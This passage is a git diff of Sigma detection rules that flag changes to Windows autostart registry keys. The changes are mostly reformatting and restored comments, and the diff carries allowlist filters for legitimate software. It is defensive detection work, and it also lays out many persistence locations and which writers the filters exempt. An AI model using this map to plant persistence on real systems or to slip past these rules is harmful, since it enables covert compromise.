17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d - - https://persistence-info.github.io/Data/userinitmprlogonscript.html -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split), wagga (name) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys + - https://persistence-info.github.io/Data/userinitmprlogonscript.html # UserInitMprLogonScript +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name) date: 2019/10/25 modified: 2023/08/17 tags: @@ -48,15 +47,15 @@ detection: filter_empty: Details: (Empty) filter_msoffice: - - TargetObject|contains: - - \Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PROTOCOLS\Handler\ - - \ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\ - - Details: - - '{314111c7-a502-11d2-bbca-00c04f8ec294}' - - '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}' - - '{42089D2D-912D-4018-9087-2B87803E93FB}' - - '{5504BE45-A83B-4808-900A-3A5C36E7F77A}' - - '{807583E5-5146-11D5-A672-00B0D022E945}' + - TargetObject|contains: + - \Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\PROTOCOLS\Handler\ + - \ClickToRunStore\HKMU\SOFTWARE\Classes\PROTOCOLS\Handler\ + - Details: + - '{314111c7-a502-11d2-bbca-00c04f8ec294}' + - '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}' + - '{42089D2D-912D-4018-9087-2B87803E93FB}' + - '{5504BE45-A83B-4808-900A-3A5C36E7F77A}' + - '{807583E5-5146-11D5-A672-00B0D022E945}' filter_chrome: TargetObject|contains: \SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} filter_edge: @@ -74,8 +73,7 @@ detection: Image|endswith: \OfficeClickToRun.exe condition: registry_set and (main_selection and not 1 of filter_*) falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml index fec6def6b..e316d08de 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml @@ -1,16 +1,15 @@ title: CurrentControlSet Autorun Keys Modification id: f674e36a-4b91-431e-8aef-f8a96c2aca35 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -49,7 +48,7 @@ detection: filter_onenote: Image: C:\Windows\System32\spoolsv.exe TargetObject|contains: Print\Monitors\Appmon\Ports\Microsoft.Office.OneNote_ - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI filter_poqexec: @@ -66,8 +65,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml index d1b3d126c..c9edd1252 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml @@ -1,17 +1,16 @@ title: CurrentVersion Autorun Keys Modification id: 20f0ee37-5942-4e45-b7d5-c5b5db9df5cd related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -50,28 +49,28 @@ detection: - \Authentication\Credential Providers - \Authentication\Credential Provider Filters filter_all: - - Details: (Empty) - - TargetObject|endswith: \NgcFirst\ConsecutiveSwitchCount - - Image|endswith: - - \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe - - \AppData\Roaming\Spotify\Spotify.exe - - \AppData\Local\WebEx\WebexHost.exe - - Image: - - C:\WINDOWS\system32\devicecensus.exe - - C:\Windows\system32\winsat.exe - - C:\Program Files\Microsoft OneDrive\StandaloneUpdater\OneDriveSetup.exe - - C:\Program Files\Microsoft OneDrive\Update\OneDriveSetup.exe - - C:\Program Files (x86)\Microsoft OneDrive\Update\OneDriveSetup.exe - - C:\Program Files\KeePass Password Safe 2\ShInstUtil.exe - - C:\Program Files\Everything\Everything.exe - - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe + - Details: (Empty) + - TargetObject|endswith: \NgcFirst\ConsecutiveSwitchCount + - Image|endswith: + - \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe # C:\Users\*\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe + - \AppData\Roaming\Spotify\Spotify.exe + - \AppData\Local\WebEx\WebexHost.exe + - Image: + - C:\WINDOWS\system32\devicecensus.exe + - C:\Windows\system32\winsat.exe + - C:\Program Files\Microsoft OneDrive\StandaloneUpdater\OneDriveSetup.exe + - C:\Program Files\Microsoft OneDrive\Update\OneDriveSetup.exe + - C:\Program Files (x86)\Microsoft OneDrive\Update\OneDriveSetup.exe + - C:\Program Files\KeePass Password Safe 2\ShInstUtil.exe + - C:\Program Files\Everything\Everything.exe + - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe filter_logonui: Image: C:\Windows\system32\LogonUI.exe TargetObject|contains: - - \Authentication\Credential Providers\{D6886603-9D2F-4EB2-B667-1971041FA96B}\ - - \Authentication\Credential Providers\{BEC09223-B018-416D-A0AC-523971B639F5}\ - - \Authentication\Credential Providers\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\ - - \Authentication\Credential Providers\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\ + - \Authentication\Credential Providers\{D6886603-9D2F-4EB2-B667-1971041FA96B}\ # PIN + - \Authentication\Credential Providers\{BEC09223-B018-416D-A0AC-523971B639F5}\ # fingerprint + - \Authentication\Credential Providers\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\ # facial recognizion + - \Authentication\Credential Providers\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\ # Trusted Signal (Phone proximity, Network location) filter_edge: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\ @@ -82,8 +81,7 @@ detection: TargetObject|contains: DropboxExt Details|endswith: A251-47B7-93E1-CDD82E34AF8B} filter_opera: - TargetObject|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Opera - Browser Assistant + TargetObject|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Opera Browser Assistant Details: C:\Program Files\Opera\assistant\browser_assistant.exe filter_itunes: TargetObject|endswith: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iTunesHelper @@ -143,11 +141,10 @@ detection: Details: C:\Program Files\Aurora-Agent\tools\aurora-dashboard.exe filter_everything: TargetObject|endswith: \Microsoft\Windows\CurrentVersion\Run\Everything - Details|endswith: \Everything\Everything.exe" -startup + Details|endswith: \Everything\Everything.exe" -startup # We remove the starting part as it could be installed in different locations condition: registry_set and (all of current_version_* and not 1 of filter_*) falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml index 3ccd8a9a4..662ff66fa 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml @@ -1,16 +1,15 @@ title: CurrentVersion NT Autorun Keys Modification id: cbf93e5d-ca6c-4722-8bea-e9119007c248 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -37,14 +36,14 @@ detection: - \Winlogon\AlternateShells\AvailableShells - \Windows\IconServiceLib - \Windows\Appinit_Dlls - - \Image File Execution Options + - \Image File Execution Options # Covered in better details in 36803969-5421-41ec-b92f-8500f79c23b0 - \Font Drivers - \Drivers32 - \Windows\Run - \Windows\Load filter_empty: Details: (Empty) - filter_legitimate_subkey: + filter_legitimate_subkey: # Legitimately used subkeys of \Image File Execution Options, which are not used for persistence (see https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) TargetObject|contains: \Image File Execution Options\ TargetObject|endswith: - \DisableExceptionChainValidation @@ -53,12 +52,12 @@ detection: Image|startswith: C:\Program Files (x86)\Microsoft\Temp\ Image|endswith: \MicrosoftEdgeUpdate.exe filter_msoffice: - - TargetObject|contains: - - \ClickToRunStore\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ - - \ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ - - Image: - - C:\Program Files\Microsoft Office\root\integration\integrator.exe - - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe + - TargetObject|contains: + - \ClickToRunStore\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ + - \ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ + - Image: + - C:\Program Files\Microsoft Office\root\integration\integrator.exe + - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe filter_officeclicktorun: Image|startswith: - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ @@ -77,20 +76,17 @@ detection: Image|endswith: \ngen.exe filter_onedrive: Image|endswith: \AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe - TargetObject|endswith: \Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached - Update Binary + TargetObject|endswith: \Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary Details|startswith: C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\ Details|endswith: \AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" - condition: registry_set and (nt_current_version_base and nt_current_version and - not 1 of filter_*) + condition: registry_set and (nt_current_version_base and nt_current_version and not 1 of filter_*) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml index b96035714..a03e05d9c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml @@ -1,16 +1,15 @@ title: Internet Explorer Autorun Keys Modification id: a80f662f-022f-4429-9b8c-b1a41aaa6688 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -53,8 +52,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml index e5658e018..529a917b7 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml @@ -1,16 +1,15 @@ title: Office Autorun Keys Modification id: baecf8fb-edbf-429f-9ade-31fc3f22b970 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -46,15 +45,19 @@ detection: - C:\Windows\System32\msiexec.exe - C:\Windows\System32\regsvr32.exe TargetObject|contains: + # Remove any unused addins in your environment from the filter + # Known addins for excel - \Excel\Addins\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\ - \Excel\Addins\ExcelPlugInShell.PowerMapConnect\ - \Excel\Addins\NativeShim\ - \Excel\Addins\NativeShim.InquireConnector.1\ - \Excel\Addins\PowerPivotExcelClientAddIn.NativeEntry.1\ + # Known addins for outlook - \Outlook\AddIns\AccessAddin.DC\ - \Outlook\AddIns\ColleagueImport.ColleagueImportAddin\ - \Outlook\AddIns\EvernoteCC.EvernoteContactConnector\ - \Outlook\AddIns\EvernoteOLRD.Connect\ + # - '\Outlook\Addins\GrammarlyAddIn.Connect' # Uncomment if you use Grammarly - \Outlook\Addins\Microsoft.VbaAddinForOutlook.1\ - \Outlook\Addins\OcOffice.OcForms\ - \Outlook\Addins\\OneNote.OutlookAddin @@ -78,8 +81,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml index d1856d703..5130bbd07 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml @@ -1,16 +1,15 @@ title: Session Manager Autorun Keys Modification id: 046218bd-e0d8-4113-a3c3-895a12b2b298 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -37,16 +36,14 @@ detection: - \AppCertDlls filter: Details: (Empty) - condition: registry_set and (session_manager_base and session_manager and not - filter) + condition: registry_set and (session_manager_base and session_manager and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml index 989357d6d..60a58c161 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml @@ -1,16 +1,15 @@ title: System Scripts Autorun Keys Modification id: e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -41,8 +40,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml index 583c61122..0e3a1660b 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml @@ -1,16 +1,15 @@ title: WinSock2 Autorun Keys Modification id: d6c2ce7e-afb5-4337-9ca4-4b5254ed0565 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: derived + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: derived status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -31,19 +30,17 @@ detection: - \Protocol_Catalog9\Catalog_Entries - \NameSpace_Catalog5\Catalog_Entries filter: - - Details: (Empty) - - Image: C:\Windows\System32\MsiExec.exe - - Image: C:\Windows\syswow64\MsiExec.exe - condition: registry_set and (winsock_parameters_base and winsock_parameters and - not filter) + - Details: (Empty) + - Image: C:\Windows\System32\MsiExec.exe + - Image: C:\Windows\syswow64\MsiExec.exe + condition: registry_set and (winsock_parameters_base and winsock_parameters and not filter) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml index 72989089a..ddcb43c01 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml @@ -1,17 +1,16 @@ title: Wow6432Node CurrentVersion Autorun Keys Modification id: b29aed60-ebd1-442b-9cb5-16a1d0324adb related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: experimental description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -55,12 +54,12 @@ detection: - C:\Program Files (x86)\Microsoft Office\root\integration\integrator.exe TargetObject|contains: \Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\ filter_dropbox: - - Details|endswith: -A251-47B7-93E1-CDD82E34AF8B} - - Details: grpconv -o - - Details|contains|all: - - C:\Program Files - - \Dropbox\Client\Dropbox.exe - - ' /systemstartup' + - Details|endswith: -A251-47B7-93E1-CDD82E34AF8B} + - Details: grpconv -o + - Details|contains|all: + - C:\Program Files + - \Dropbox\Client\Dropbox.exe + - ' /systemstartup' filter_evernote: TargetObject|endswith: \Explorer\Browser Helper Objects\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\NoExplorer filter_dotnet: @@ -86,25 +85,24 @@ detection: - C:\Windows\Temp\ Image|contains: - \winsdksetup.exe - - \windowsdesktop-runtime- - - \AspNetCoreSharedFrameworkBundle- + - \windowsdesktop-runtime- # C:\WINDOWS\Temp\{751E2E78-46DC-4376-9205-99219CDC34AE}\.be\windowsdesktop-runtime-6.0.12-win-x86.exe + - \AspNetCoreSharedFrameworkBundle- # "C:\ProgramData\Package Cache\{b52191c1-a9c0-4b34-9a4e-930c2dd8a540}\AspNetCoreSharedFrameworkBundle-x86.exe" /burn.runonce Details|endswith: ' /burn.runonce' filter_uninstallers: + # This image path is linked with different uninstallers when running as admin unfortunately Image|startswith: C:\Windows\Installer\MSI TargetObject|contains: \Explorer\Browser Helper Objects filter_msiexec: Image: C:\WINDOWS\system32\msiexec.exe TargetObject|contains: \SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ - condition: registry_set and (all of selection_wow_current_version_* and not 1 - of filter_*) + condition: registry_set and (all of selection_wow_current_version_* and not 1 of filter_*) fields: - SecurityID - ObjectName - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up autorun keys for legitimate reason level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml index 176ff0480..e8fceeea5 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml @@ -1,16 +1,15 @@ title: Wow6432Node Classes Autorun Keys Modification id: 18f2065c-d36c-464a-a748-bcf909acb2e3 related: - - id: 17f878b8-9968-4578-b814-c4217fc5768c - type: obsoletes + - id: 17f878b8-9968-4578-b814-c4217fc5768c + type: obsoletes status: test description: Detects modification of autostart extensibility point (ASEP) in registry. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns - - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d -author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, - oscd.community, Tim Shelton, frack113 (split) + - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys +author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) date: 2019/10/25 modified: 2023/08/17 tags: @@ -49,8 +48,7 @@ fields: - OldValueType - NewValueType falsepositives: - - Legitimate software automatically (mostly, during installation) sets up autorun - keys for legitimate reason + - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason - Legitimate administrator sets up 